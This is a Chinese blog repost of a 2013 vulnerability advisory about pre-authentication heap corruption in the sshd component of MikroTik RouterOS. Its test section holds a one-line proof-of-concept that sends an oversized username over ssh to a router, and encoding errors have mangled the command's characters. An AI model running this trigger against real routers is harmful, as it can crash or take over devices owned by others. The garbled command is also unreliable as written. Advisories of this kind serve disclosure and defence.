MikroTik RouterOS ‘sshd’组件多个堆内存破坏漏洞

企鹅博客 2019年7月13日18:34:03 发表评论 142 views

发布日期:2013-09-02
更新日期:2013-09-14

受影响系统:
MikroTik RouterOS
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 62110

MikroTik RouterOS 是路由操作系统,是基于Linux核心开发,兼容x86 PC的路由软件,将普通PC变为高性能路由器,现在已移植到MikroTik RouterBOARD硬件平台运行。

MikroTik RouterOS的sshd组件存在远程堆破坏漏洞,利用此漏洞可获取路由器设备的完全访问权限。

<*来源:Kingcope (kingcope@gmx.net)
 
  链接:http://kingcope.wordpress.com/2013/09/02/mikrotik-routeros-5-and-6-sshd-remote-preauth-heap-corruption/
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

ssh -l`perl -e &acirc;??print &acirc;??A&acirc;?&#157; x 100000&#39;` &amp;lt;ip of mikrotik router&amp;gt;

建议:
--------------------------------------------------------------------------------
厂商补丁:

除非注明,否则均为@企鹅博客原创文章,转载必须以链接形式标明本文链接

本文链接:https://www.qieseo.com/153594.html

weinxin
欢迎加入中国SEO站长博客之家
本站的所有资源都会上传分享到博客之家,希望大家互相学习交流进步。
企鹅博客

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: